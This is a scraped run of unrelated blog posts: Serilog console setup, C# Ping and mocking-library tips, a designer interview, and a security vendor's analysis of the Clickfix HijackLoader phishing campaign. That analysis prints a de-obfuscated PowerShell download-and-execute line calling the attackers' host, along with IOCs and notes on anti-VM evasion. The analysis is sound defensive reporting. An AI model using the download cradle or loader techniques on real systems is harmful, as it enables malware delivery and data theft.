    Then you can run the application, navigate to an endpoint, and see the logs!

    Serilog logs as plain text

    But I don’t like how logs are displayed, too many details!

    Let me add a theme: in the AppSettings file, I can add a theme configuration:

    "Args": {
        "configure": [
        {
            "Name": "Console",
            "Args": {
    +        "theme": "Serilog.Sinks.SystemConsole.Themes.AnsiConsoleTheme::Code, Serilog.Sinks.Console",
            "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
            }
        }
        ]
    }
    

    This makes Serilog show the logs with a different shape:

    Serilog logs with a simple theme

    So, just by updating the AppSettings file, you can fine-tune the behavior and the output of the logger. In this way, you can customize Release builds to update the AppSettings file and define custom properties for every deploy environment.

    Further reading

    If you want to learn more about the different topics discussed in this article:

    🔗 Serilog Structured Data | Code4IT

    🔗 Serilog Console Sink | GitHub

    🔗 How to integrate Serilog and Seq | Code4IT

    Wrapping up

    In this article, we’ve seen how to integrate Serilog in a .NET application to print the logs on the application Console.

    Time to recap the key points:

    • install the Serilog, Serilog.AspNetCore, and Serilog.Extensions.Logging NuGet packages to integrate the basic functionalities of Serilog
    • download the Serilog.Sinks.Console and Serilog.Sinks.Async NuGet packages to use the Console as a destination of your logs
    • update the Program class to specify that the application must use Serilog
    • use ILogger<T> instead of Serilog.ILogger
    • define the settings in the appsettings.json file instead of directly in the code

    Finally, if you want to see the full example, here’s the GitHub repository used for this article

    Happy coding!

    🐧



    Source link

  • C# Tip: use the Ping class instead of an HttpClient to ping an endpoint




    What if you wanted to see if a remote website is up and running?

    Probably, the first thing that may come to your mind is to use a common C# class: HttpClient. But it may cause you some trouble.

    There is another way to ping an endpoint: using the Ping class.

    Why not using HttpClient

    Say that you need to know if the host at code4it.dev is live. With HttpClient you might use something like this:

    async Task Main()
    {
        var url = "https://code4it.dev";
    
        var isUp = await IsWebsiteUp_Get(url);
    
        Console.WriteLine("The website is {0}", isUp ? "up" : "down");
    }
    
    private async Task<bool> IsWebsiteUp_Get(string url)
    {
        var httpClient = new HttpClient(); // yes, I know, I should use HttpClientFactory!
        var httpResponse = await httpClient.GetAsync(url);
        return httpResponse.IsSuccessStatusCode;
    }
    

    There are some possible issues with this approach: what if there is no resource available at the root? You will have to define a specific path. And what happens if the defined resource is under authentication? IsWebsiteUp_Get will always return false, even when the site is correctly up.

    Also, it is possible that the endpoint does not accept HttpGet requests. So, we can use HttpHead instead:

    private async Task<bool> IsWebsiteUp_Head(string url)
    {
        var httpClient = new HttpClient();
        HttpRequestMessage request = new HttpRequestMessage
        {
            RequestUri = new Uri(url),
            Method = HttpMethod.Head // Not GET, but HEAD
        };
        var result = await httpClient.SendAsync(request);
        return result.IsSuccessStatusCode;
    }
    

    We have the same issues described before, but at least we are not bound to a specific HTTP verb.

    So, we need to find another way.

    How to use Ping

    By using the Ping class, we can get rid of those checks and evaluate the status of the Host, not of a specific resource.

    private async Task<bool> IsWebsiteUp_Ping(string url)
    {
        Ping ping = new Ping();
        var hostName = new Uri(url).Host;
    
        PingReply result = await ping.SendPingAsync(hostName);
        return result.Status == IPStatus.Success;
    }
    

    The Ping class lives in the System.Net.NetworkInformation namespace and allows you to perform the same operations as the ping command you usually run via the command line.
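
    For instance, here’s a minimal sketch with an explicit timeout (the 3000 ms value is arbitrary):

    using System.Net.NetworkInformation;

    var ping = new Ping();
    // SendPingAsync accepts an optional timeout, expressed in milliseconds
    PingReply reply = await ping.SendPingAsync("code4it.dev", 3000);
    Console.WriteLine($"{reply.Status} in {reply.RoundtripTime} ms");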

    Conclusion

    We’ve seen why you should use Ping instead of HttpClient to perform a ping-like operation.

    There’s more than this: head to this more complete article to learn more.

    👉 Let’s discuss it on Twitter or on the comment section below.

    🐧





    Source link

  • syntax cheat sheet | Code4IT


    Moq and NSubstitute are two of the most used libraries for mocking dependencies in your Unit Tests. How do they differ? How can we move from one library to the other?


    When writing Unit Tests, you usually want to mock dependencies. In this way, you can define the behavior of those dependencies, and have full control of the system under test.

    For .NET applications, two of the most used mocking libraries are Moq and NSubstitute. They allow you to create and customize the behavior of the services injected into your classes. Even though they have similar functionalities, their syntax is slightly different.

    In this article, we will learn how the two libraries implement the most used functionalities; in this way, you can easily move from one to another if needed.

    A real-ish example

    As usual, let’s use a real example.

    For this article, I’ve created a dummy class, StringsWorker, that does nothing but call another service, IStringUtility.

    public class StringsWorker
    {
        private readonly IStringUtility _stringUtility;
    
        public StringsWorker(IStringUtility stringUtility)
            => _stringUtility = stringUtility;
    
        public string[] TransformArray(string[] items)
            => _stringUtility.TransformAll(items);
    
        public string[] TransformSingleItems(string[] items)
            => items.Select(i => _stringUtility.Transform(i)).ToArray();
    
        public string TransformString(string originalString)
            => _stringUtility.Transform(originalString);
    }
    

    To test the StringsWorker class, we will mock its only dependency, IStringUtility. This means that we won’t use a concrete class that implements IStringUtility, but rather we will use Moq and NSubstitute to mock it, defining its behavior and simulating real method calls.

    Of course, to use the two libraries, you have to install them in each test project.

    How to define mocked dependencies

    The first thing to do is to instantiate a new mock.

    With Moq, you create a new instance of Mock<IStringUtility>, and then inject its Object property into the StringsWorker constructor:

    private Mock<IStringUtility> moqMock;
    private StringsWorker sut;
    
    public MoqTests()
    {
        moqMock = new Mock<IStringUtility>();
        sut = new StringsWorker(moqMock.Object);
    }
    

    With NSubstitute, instead, you declare it with Substitute.For<IStringUtility>() – which returns an IStringUtility, not wrapped in any class – and then you inject it into the StringsWorker constructor:

    private IStringUtility nSubsMock;
    private StringsWorker sut;
    
    public NSubstituteTests()
    {
        nSubsMock = Substitute.For<IStringUtility>();
        sut = new StringsWorker(nSubsMock);
    }
    

    Now we can customize moqMock and nSubsMock to add behaviors and verify the calls to those dependencies.

    Define method result for a specific input value: the Return() method

    Say that we want to customize our dependency so that, every time we pass “ciao” as a parameter to the Transform method, it returns “hello”.

    With Moq we use a combination of Setup and Returns.

    moqMock.Setup(_ => _.Transform("ciao")).Returns("hello");
    

    With NSubstitute we don’t use Setup, but we directly call Returns.

    nSubsMock.Transform("ciao").Returns("hello");
    

    Define method result regardless of the input value: It.IsAny() vs Arg.Any()

    Now we don’t care about the actual value passed to the Transform method: we want that, regardless of its value, the method always returns “hello”.

    With Moq, we use It.IsAny<T>() and specify the type of T:

    moqMock.Setup(_ => _.Transform(It.IsAny<string>())).Returns("hello");
    

    With NSubstitute, we use Arg.Any<T>():

    nSubsMock.Transform(Arg.Any<string>()).Returns("hello");
    

    Define method result based on a filter on the input: It.Is() vs Arg.Is()

    Say that we want to return a specific result only when a condition on the input parameter is met.

    For example, every time we pass a string that starts with “IT” to the Transform method, it must return “ciao”.

    With Moq, we use It.Is<T>(func) and we pass an expression as an input.

    moqMock.Setup(_ => _.Transform(It.Is<string>(s => s.StartsWith("IT")))).Returns("ciao");
    

    Similarly, with NSubstitute, we use Arg.Is<T>(func).

    nSubsMock.Transform(Arg.Is<string>(s => s.StartsWith("IT"))).Returns("ciao");
    

    Small trivia: for NSubstitute, the filter is of type Expression<Predicate<T>>, while for Moq it is of type Expression<Func<TValue, bool>>: don’t worry, you can write them in the same way!

    Throwing exceptions

    Since you should test not only happy paths, but also those where an error occurs, you should write tests in which the injected service throws an exception, and verify that that exception is handled correctly.

    With both libraries, you can throw a generic exception by specifying its type:

    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws<ArgumentException>();
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws<ArgumentException>();
    

    You can also throw a specific exception instance – maybe because you want to add an error message:

    var myException = new ArgumentException("My message");
    
    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws(myException);
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws(myException);
    

    If you don’t want to handle that exception, but you want to propagate it up, you can verify it in this way:

    Assert.Throws<ArgumentException>(() => sut.TransformArray(null));
    

    Verify received calls: Verify() vs Received()

    Sometimes, to understand if the code follows the execution paths as expected, you might want to verify that a method has been called with some parameters.

    To verify it, you can use the Verify method on Moq.

    moqMock.Verify(_ => _.Transform("hello"));
    

    Or, if you use NSubstitute, you can use the Received method.

    nSubsMock.Received().Transform("hello");
    

    Similarly to what we’ve seen before, you can use It.IsAny, It.Is, Arg.Any, and Arg.Is to verify some properties of the parameters passed as input.
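
    For example, reusing the predicate from before to verify a received call:

    //Moq
    moqMock.Verify(_ => _.Transform(It.Is<string>(s => s.StartsWith("IT"))));

    //NSubstitute
    nSubsMock.Received().Transform(Arg.Is<string>(s => s.StartsWith("IT")));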

    Verify the exact count of received calls

    Other times, you might want to verify that a method has been called exactly N times.

    With Moq, you can add a parameter to the Verify method:

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    moqMock.Verify(_ => _.Transform(It.IsAny<string>()), Times.Exactly(3));
    

    Note that you can specify different values for that parameter, like Times.Exactly, Times.Never, Times.Once, Times.AtLeast, and so on.

    With NSubstitute, on the contrary, you can only specify a defined value, added as a parameter to the Received method.

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    nSubsMock.Received(3).Transform(Arg.Any<string>());
    

    Reset received calls

    As you remember, the mocked dependencies have been instantiated in the constructor, so every test method uses the same instances. This can cause trouble, especially when checking how many calls the dependencies have received, because the count of received calls accumulates across all the test methods run before. Therefore, we need to reset the count of received calls between tests.

    In NUnit, you can define a method that runs before each test method by decorating it with the SetUp attribute:

    [SetUp]
    public void Setup()
    {
      // reset count
    }
    

    Here we can reset the count of recorded method invocations on the dependencies and make sure that our test methods always start from a clean state.

    With Moq, you can use Invocations.Clear():

    [SetUp]
    public void Setup()
    {
        moqMock.Invocations.Clear();
    }
    

    While, with NSubstitute, you can use ClearReceivedCalls():

    [SetUp]
    public void Setup()
    {
        nSubsMock.ClearReceivedCalls();
    }
    

    Further reading

    As always, the best way to learn what a library can do is to head to its documentation. Here you can find the links to the Moq and NSubstitute docs.

    🔗 Moq documentation | GitHub

    🔗 NSubstitute documentation | NSubstitute

    If you already use Moq but are having some trouble testing and configuring IHttpClientFactory instances, I’ve got you covered:

    🔗 How to test HttpClientFactory with Moq | Code4IT

    Finally, if you want to see the complete code of this article, you can find it on GitHub; I’ve written the exact same tests with both libraries so that you can compare them more easily.

    🔗 GitHub repository for the code used in this article | GitHub

    Conclusion

    In this article, we’ve seen how Moq and NSubstitute allow us to perform some basic operations when writing unit tests in C#. They are similar, but each one has some functionality that the other lacks – or, at least, that I couldn’t find in both.

    Which library do you use, Moq or NSubstitute? Or maybe, another one?

    Happy coding!
    🐧



    Source link

  • Craft, Clarity, and Care: The Story and Work of Mengchu Yao

    Craft, Clarity, and Care: The Story and Work of Mengchu Yao


    Hi, I’m Mengchu Yao from Taiwan, and I am currently based in Tokyo, Japan, where I work as a web designer at baqemono.inc.

    I’m truly grateful to be able to pursue my design career in a cross-cultural environment. Life here allows me to appreciate the small things and encourages me to stay curious and open-minded.

    Featured Work

    Movie × AI model

    We created the website for AI model Inc., a company that leverages AI models and virtual personalities to offer digital transformation (DX) services. The site was created to showcase their AI video generation solutions.

    Personal notes

    This website design is centered around the concept of “natural and elegant AI-generated visuals”. One of the key challenges was presenting a large number of dynamic, immersive visual elements and interactions within a single-page layout. We spent a lot of time finding the right balance between animation and message delivery, ensuring that every motion looks beautiful and meaningful at the same time.

    This was also a project where I sketched the animation for almost every section myself, working closely with developers to fine-tune the motion. The process was both challenging and fascinating, which made it rewarding and significant for my growth.

    Vlag yokohama

    We created the official website for “Vlag yokohama,” a new members-only creative lounge and workspace located on the top (42nd) floor of THE YOKOHAMA FRONT at Yokohama Station.

    Personal notes

    This project was a rare opportunity that allowed me to explore and be creative while using the brand guidelines as a foundation, in response to the request “to use the Yokohama cityscape as the backbone of visuals while incorporating elements that evoke the feeling of wind and motion.”

    One thoughtful touch is the main visual on the homepage: it automatically changes with the time of day (morning, afternoon, and evening), reflecting Yokohama’s shifting ambiance and adding a subtle delight to the browsing experience.

    ANGELUX

    We created a brand-new corporate website for Angelux Co., Ltd., a company founded in 1987 that specializes in beauty salon and spa operations, along with cosmetics product development and sales.

    Personal notes

    This project began with the client’s request to clearly distinguish between the service website and the corporate site, and to position the latter as a recruitment platform that authentically reflects the people behind the brand.

    To embody Angelux’s strong emphasis on craftsmanship, we featured actual treatment scenes in the main visual. The overall design blends a sense of classic professionalism with a soft modern aesthetic, creating a calm and reassuring atmosphere. This approach not only helps build trust in the company but also effectively appeals to potential talent interested in joining Angelux.

    The visual design incorporated elements reminiscent of high-quality cosmetics that convey the clean beauty and clarity of skincare.

    Infodio

    We redesigned the official website for Infodio Inc., a company that specializes in advanced technologies such as AI-OCR and Natural Language Processing (NLP), and offers high-speed, automated transcription products and services.

    Personal notes

    The original website failed to effectively communicate “AI as core” and often misled the client’s applicants. To resolve the issue, our strategy was to emphasize the products. The revamp successfully conveys the true essence of the brand and attracts the right potential talent with clear messaging.

    For the visuals, we started from scratch. It was challenging but also the most fun part. As the products were the focal point of the design, the key was to show both the authenticity and visual appeal.

    Background

    After getting my master’s degree in Information Design, I joined the Tokyo-based digital design studio baqemono.inc. Since then, I have had the opportunity to lead several challenging and creatively fulfilling projects from the early stages of my career.

    These experiences have shaped me tremendously and deepened my passion for this field. Throughout this journey, the studio’s founder has remained the designer I admire the most — a constant source of inspiration whose presence reminds me to approach every project with both respect and enthusiasm.

    Design Philosophy

    A strong concept is your north star

    I believe every design should be built upon a clear and compelling core idea. Whenever I begin a project, I always ask myself: “What am I designing for?”

    Structure comes first

    Before diving into visuals, I make sure I spend enough time on wireframes and the overall structure.
If the content and hierarchy aren’t clearly defined at the start, the rest of the bits and pieces become noise that clouds judgment. A solid framework helps me stay focused and gives me room to refine the details.

    Listen to the discomfort in your gut

    Whenever I feel that something’s “not quite right”, I know I have to come back and take another look, because these subtle feelings often point to something important.
 I believe that as designers we should be honest with ourselves, take a pause to examine, and revise. Each small tweak is a step closer to your truth.

    You have to genuinely love it

    I also believe that every designer should love their own work so that the work can make its impact.
This isn’t just about aesthetics — it’s about fully owning the concept, the details, and the final outcome.

    Teamwork is everything

    No project is ever completed by me alone — it’s always the result of a team effort.
 I deeply respect every member involved, and I constantly ask myself: “What can I do to make the collaboration smoother for everyone?”

    Tools and Techniques

    • Photoshop
    • Figma
    • After Effects
    • Eagle

    Future goals

    My main goal for the year is to start building my portfolio website. I’ve been mainly sharing my work on social media, but as I’ve gained more hands-on experience and creative outputs over time, I realized that it’s important to have a dedicated space that fully reflects who I am as a designer today.

    Recently, I started to make some changes in my daily routine, such as better sleeping hours and becoming a morning person to be more focused and productive for my work. My mind is clearer, and my body feels great, just as if I’m preparing myself for the next chapter of my creative journey.

    Final Thoughts

    Giving someone advice is always a little tricky for me, but one phrase that has resonated deeply with me throughout my journey is: “Go slow to go fast”. Finding your own balance between creating and resting while continuing to stay passionate about life is, to me, the most important thing of all.

    Thank you so much for taking the time to read this. I hope you enjoyed the works and thoughts I’ve shared!

    A heartfelt thanks as well to Codrops and Manoela for inviting me to be part of this Designer Spotlight. Ever since I stepped into the world of web design, Codrops has been a constant source of inspiration, showing me so many amazing works and creators. I’m truly honored and grateful to be featured among them.

    Contact

    I’m always excited to connect with people to share ideas and explore new opportunities together.
If anything here speaks to you, feel free to reach out — I’d love to chat more and hear your thoughts!
    I also share updates on my latest projects from time to time on social media, so feel free to drop by and say hi 😊



    Source link

  • An Analysis of the Clickfix HijackLoader Phishing Campaign 

    An Analysis of the Clickfix HijackLoader Phishing Campaign 


    Table of Contents 

    • The Evolving Threat of Attack Loaders
    • Technical Methodology and Analysis
      • Initial Access and Social Engineering
      • Multi-Stage Obfuscation and De-obfuscation
      • Anti-Analysis Techniques
    • Quick Heal \ Seqrite Protection

     

    Introduction 

    With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis. 

    We have recently seen a surge in HijackLoader malware. It first emerged in the second half of 2023 and quickly gained attention for its payload-delivery capabilities and its interesting techniques for loading and executing those payloads. It is mostly offered as Malware-as-a-Service and has been observed mainly in financially motivated campaigns worldwide.

    HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base. 

    Since June 2025, we have observed attackers using Clickfix to lead unsuspecting victims into downloading malicious .msi installers that, in turn, resulted in HijackLoader execution. In those campaigns, DeerStealer was observed as the final executable downloaded onto the victim’s machine.

    Recently, TAG-150 has also emerged with CastleLoader/CastleBot, while leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem.

    HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as: 

    • Process doppelgänging with transacted sections 
    • Direct syscalls under WOW64 

    Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks. 

    Infection Chain 


    Technical Overview 

    Initial access starts with a CAPTCHA-based social-engineering phishing campaign, which we have identified as Clickfix (the same technique attackers were seen using in June 2025).

    Fig1: CAPTCHA-Based Phishing Page for Social Engineering
    Fig2: HTA Dropper File for Initial Execution

     This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.   

    Fig3: Initial PowerShell Loader Script

    Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below. 

    Fig4: First-Stage Obfuscated PowerShell Script

    The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays. 
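
    As a toy illustration of that pattern (a sketch written in C# for readability rather than the script’s actual PowerShell), a command name can be rebuilt at runtime from arithmetic on character codes, so it never appears as a plain string literal:

    using System;
    using System.Linq;

    class ObfuscationDemo
    {
        static void Main()
        {
            // "iex" rebuilt from arithmetic on character codes instead of a literal
            int[] codes = { 0x68 + 1, 0x64 + 1, 0x77 + 1 }; // 'i', 'e', 'x'
            string command = new string(codes.Select(c => (char)c).ToArray());
            Console.WriteLine(command); // prints: iex
        }
    }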

    Resolving the obfuscated script, we see it decode into the command below, which, while still unreadable, can be fully de-obfuscated.

    Fig5: Deobfuscation of the First stage obfuscated payload

    After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.  

    iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))  

    When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.  

    Fig6: Debugger View of Failed C2 Connection

    The file samie_bower.mp3 is another PowerShell script; at over 18,000 lines, it is heavily obfuscated and represents the next stage of the loader.

    Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

    Through debugging, we observe that this PowerShell file performs numerous anti-VM checks, including inspecting the number of running processes and modifying registry keys.

    Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

    These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment. 

    While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command. 

    Fig9: Final execution

    Once the gibberish variable declaration above is resolved, we see that, upon execution, it performs Base64 decoding, XOR operations, and additional decryption routines before loading another PowerShell script that likely injects the PE file.

    Fig10: Intermediate PowerShell Script for PE Injection
    Fig11: Base64-Encoded Embedded PE Payload

     

    Decoding this file reveals an embedded PE file, identifiable by its MZ header. 

    Fig12: Decoded PE File with MZ Header
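
    That identification step is easy to reproduce. Below is a minimal analyst-side sketch (not the loader’s own code; encodedBlob is hypothetical sample data) that Base64-decodes a blob and tests for the “MZ” magic bytes of a DOS/PE header:

    using System;

    class PeCheck
    {
        static void Main()
        {
            // hypothetical stand-in for the Base64 blob carved out of the script
            string encodedBlob = "TVqQAAMAAAAEAAAA";
            byte[] payload = Convert.FromBase64String(encodedBlob);

            // PE files start with the ASCII bytes 'M' 'Z' (the DOS header magic)
            bool looksLikePe = payload.Length >= 2 &&
                               payload[0] == (byte)'M' && payload[1] == (byte)'Z';
            Console.WriteLine(looksLikePe ? "MZ header found" : "not a PE file");
        }
    }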

    This PE file is a heavily packed .NET executable. 

    Fig13: Packed .NET Executable Payload

    The executable payload loads a significant amount of code, likely extracted from its resources section. 

    Fig14: In-Memory Unpacking of the .NET Executable

    Once unpacked, the executable payload appears to load a DLL file. 

    Fig15: Protected DLL Loaded In-Memory

    This DLL file is also protected, likely to prevent reverse engineering and analysis. 

    Fig16: DLL Protection Indicators

    HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below. 

    Fig17: Final C2 Server Connection Attempt

    While this C2 is no longer accessible, the connection attempt is consistent with the behavior of the NekoStealer malware. HijackLoader has also been involved in downloading other stealers, including Lumma.

    Conclusion 

    Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment. 

    IOCs: 

    • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
    • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
    • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
    • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
    • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
    • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
    • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
    • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
    • d0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
    • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
    • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
    • 91[.]212[.]166[.]51 
    • 37[.]27[.]165[.]65:1477 
    • cosi[.]com[.]ar 
    • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
    • hxxp[:]//77[.]91[.]101[.]66/ 

    Quick Heal \ Seqrite Protection: 

    • Script.Trojan.49900.GC 
    • Loader.StealerDropperCiR 
    • Trojan.InfoStealerCiR 
    • Trojan.Agent 
    • BDS/511 

    MITRE ATT&CK: 

    Tactic | Technique ID | Technique Name
    Initial Access | T1566.002 | Phishing: Spearphishing Link (CAPTCHA phishing page)
    Initial Access | T1189 | Drive-by Compromise (malvertising, SEO poisoning, fake installers)
    Execution | T1059.001 | Command and Scripting Interpreter: PowerShell
    Defense Evasion | T1027 | Obfuscated Files or Information (multi-stage obfuscated scripts)
    Defense Evasion | T1140 | Deobfuscate/Decode Files or Information (Base64, XOR decoding)
    Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools (unhooking DLLs)
    Defense Evasion | T1070.004 | Indicator Removal: File Deletion (likely used in staged loaders)
    Defense Evasion | T1211 | Exploitation for Defense Evasion (direct syscalls under WOW64)
    Defense Evasion | T1036 | Masquerading (fake extensions like .mp3 for PowerShell scripts)
    Discovery | T1082 | System Information Discovery (VM checks, registry queries)
    Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks
    Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys (registry tampering)
    Persistence / Privilege Esc. | T1055 | Process Injection (PE injection routines)
    Command and Control (C2) | T1071.001 | Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic)
    Command and Control (C2) | T1105 | Ingress Tool Transfer (downloading additional payloads)
    Impact / Collection | T1056 / T1005 | Input Capture / Data from Local System (info-stealer functionality of final payload)

     

    Authors: 

    Niraj Lazarus Makasare 

    Shrutirupa Banerjiee 



    Source link

• Don’t use too many method arguments | Code4IT

    Don’t use too many method arguments | Code4IT



    Many times, we tend to add too many parameters to a function. But that’s not the best idea: on the contrary, when a function requires too many arguments, grouping them into coherent objects helps us write simpler code.

    Why? How can we do it? What are the main issues with having too many params? Have a look at the following snippet:

    void SendPackage(
        string name,
        string lastname,
        string city,
        string country,
        string packageId
        ) { }
    

    If you need another field about the address or the person, you will have to add a new parameter and update every existing call site to match the new function signature.

    What if we added a State argument? Is this part of the address (state = “Italy”) or something related to the package (state = Damaged)?

    Storing this field in the correct object helps clarify its meaning.

    void SendPackage(Person person, string packageId) { }
    
    class Person {
        public string Name { get; set; }
        public string LastName { get; set; }
        public Address Address {get; set;}
    }
    
    class Address {
        public string City { get; set; }
        public string Country { get; set; }
    }
    

    Another reason to avoid using lots of parameters? To avoid merge conflicts.

    Say that two devs, Alice and Bob, are working on functionalities that impact the SendPackage method. Alice, on her branch, adds a new parameter, bool withPriority. Meanwhile, Bob, on his branch, adds bool applyDiscount. Then both of them merge their branches into the main one. What’s the result? A conflict: the method now has two boolean parameters, and the order in which they end up in the final signature can cause trouble. Even worse, every call to SendPackage now takes one (or two) new parameters whose value depends on the context, so after the merge the value that Bob intended for applyDiscount might end up being passed where Alice’s withPriority belongs.
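
    One way to defuse this, sketched below with a hypothetical SendOptions type, is to group such flags into a single options object: both branches then extend the same type instead of the parameter list, and every call site sets its flags by name rather than by position.

    class SendOptions
    {
        public bool WithPriority { get; set; }  // Alice's flag
        public bool ApplyDiscount { get; set; } // Bob's flag
    }

    void SendPackage(Person person, string packageId, SendOptions options) { }

    // no positional booleans: each flag is named explicitly at the call site
    SendPackage(person, "PKG-01", new SendOptions { WithPriority = true });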

    Conclusion

    To recap, why do we need to reduce the number of parameters?

    • to give context and meaning to those parameters
    • to avoid errors with positional parameters
    • to avoid merge conflicts

    👉 Let’s discuss it on Twitter or in the comment section below!

    🐧





    Source link